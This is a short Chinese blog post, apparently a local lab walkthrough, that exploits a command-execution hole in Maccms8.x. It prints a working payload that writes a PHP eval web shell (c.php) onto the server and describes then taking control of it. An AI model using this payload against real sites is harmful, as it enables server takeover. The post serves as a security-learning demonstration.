蘋果cms8.x 命令執行漏洞本地攻擊演示
阿新 • • 發佈:2018-11-06
新出道資訊保安愛好者,有很多需要學習的地方,願有一天能追上大佬步伐。
好了,下面進入正題,上半年6月份參加了鐵人三項賽,線下web題為Maccms8.x ,當時也是通過團隊協作以及百度資源成功破解伺服器,現在我搭建了靶機,具體步驟寫出來。
1.準備:phpstudy+Maccms8.x 原始碼
搭建成功後我們先來訪問一下
因為Maccms8.x 存在命令執行漏洞,所以我們先點選search,接著直接上傳我們構造的一句話木馬payload:wd={if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}
然後直接點選Execute上傳,見上圖hackbar。
驗證是否上傳成功:我們來看一下靶機的源目錄,可以看到多出來一個c.php的檔案,說明上傳已成功。
成功連線後,我們可以看到服務機下面的所有檔案了,可以說我們已經控制了這臺伺服器,自此,入侵演示成功。
如果有興趣的童鞋趕緊去試試吧。
這條路,很黑很遠,但是我沒有想到,是這麼黑,這麼遠… 致有一顆黑客夢的你!